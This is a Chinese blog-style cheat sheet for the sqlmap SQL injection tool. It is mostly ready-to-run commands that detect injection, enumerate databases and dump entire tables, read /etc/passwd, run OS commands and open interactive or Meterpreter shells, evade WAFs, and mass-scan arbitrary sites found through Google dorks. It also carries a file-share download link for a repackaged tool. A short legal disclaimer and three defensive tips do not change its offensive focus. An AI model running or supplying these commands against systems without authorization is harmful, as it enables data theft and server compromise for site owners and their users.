SQLMap 终极渗透手册(2025全功能版)

目录

[⚠️ 法律声明](#⚠️ 法律声明)

工具下载

[🔍 基础侦查](#🔍 基础侦查)

[📂 数据枚举](#📂 数据枚举)

层级式渗透

批量操作

[🛠️ 高级功能](#🛠️ 高级功能)

[1. 权限提升](#1. 权限提升)

[2. 系统命令执行](#2. 系统命令执行)

[3. 绕过WAF](#3. 绕过WAF)

[🎯 实战场景](#🎯 实战场景)

场景1:Cookie注入

场景2:POST注入

场景3:谷歌黑客批量检测

[📊 结果管理](#📊 结果管理)

[⚡ 效率优化](#⚡ 效率优化)

[⚠️ 防护建议](#⚠️ 防护建议)


⚠️ 法律声明

所有技术仅限授权测试使用!未经授权渗透属于违法行为。


工具下载

我用夸克网盘给你分享了「sqlmap_CN.zip」,点击链接或复制整段内容,打开「夸克APP」即可获取。

/~339038pE3e~:/

链接:https://pan.quark.cn/s/0d3faddb83b2

🔍 基础侦查

|-------------------|---------|-----------------------------------------|
| 命令 | 功能 | 示例 |
| sqlmap -u "url" | 基础检测 | sqlmap -u "http://test.com/news?id=1" |
| --current-user | 当前数据库用户 | sqlmap -u "url" --current-user |
| --current-db | 当前数据库 | sqlmap -u "url" --current-db |
| --dbs | 列出所有数据库 | sqlmap -u "url" --dbs |


📂 数据枚举

层级式渗透

复制代码
# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs

# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"

# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"

# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"

批量操作

复制代码
# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs

# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100

🛠️ 高级功能

1. 权限提升

复制代码
# 检测是否为DBA
sqlmap -u "url" --is-dba

# 获取系统文件(需要高权限)
sqlmap -u "url" --file-read="/etc/passwd"

2. 系统命令执行

复制代码
# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"

# 获取交互式Shell
sqlmap -u "url" --os-shell

# 获取Meterpreter会话(需Metasploit)
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit

3. 绕过WAF

复制代码
# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"

# 设置延迟
sqlmap -u "url" --delay=3

# 随机UA
sqlmap -u "url" --random-agent

🎯 实战场景

场景1:Cookie注入

复制代码
sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3

场景2:POST注入

复制代码
sqlmap -u "http://test.com/login" --data="username=admin&password=123"

场景3:谷歌黑客批量检测

复制代码
sqlmap -g "inurl:.php?id=" --batch --smart

📊 结果管理

复制代码
# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results

# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log

效率优化

复制代码
# 多线程扫描
sqlmap -u "url" --threads=5

# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart

⚠️ 防护建议

  1. 使用参数化查询
  2. 最小化数据库权限
  3. 部署WAF防护

💡 提示:

  • 使用-v 3查看详细过程
  • 复杂环境下添加--flush-session清除缓存
  • 首次测试建议从--level=1 --risk=1开始

👉 按需组合命令参数,注意操作风险! 🚀

相关推荐
回忆是昨天里的海3 小时前
k8s部署容器化应用-tomcat
云原生·容器·kubernetes·1024程序员节
小马哥编程3 小时前
【软考架构】架构风格:RAG知识库是属于软件八大架构风格中的哪一个,黑板架构风格 ?规则系统体系风格?
大数据·计算机网络·架构·1024程序员节
離離原上譜3 小时前
python-docx 安装与快速入门
python·word·python-docx·自动化办公·1024程序员节
碧海银沙音频科技研究院3 小时前
ES7243E 模拟音频转I2S输入给BES I2S_Master数据运行流程分析
1024程序员节
FPGA_小田老师3 小时前
FPGA Debug:Vivado程序综合卡在了Run Synthesis
1024程序员节·vivado问题·run synth卡住·lut资源不足·fpga debug
车车不吃香菇3 小时前
linux的文件备份脚本
1024程序员节·备份文件·备份数据
小涵3 小时前
第 01 天:Linux 是什么?内核、发行版及其生态系统
linux·运维·devops·1024程序员节·sre
sulikey3 小时前
Qt 入门简洁笔记:信号与槽
前端·c++·笔记·qt·前端框架·1024程序员节·qt框架
在等晚安么3 小时前
记录自己写项目的第三天,springbot+redis+rabbitma高并发项目
java·spring boot·redis·1024程序员节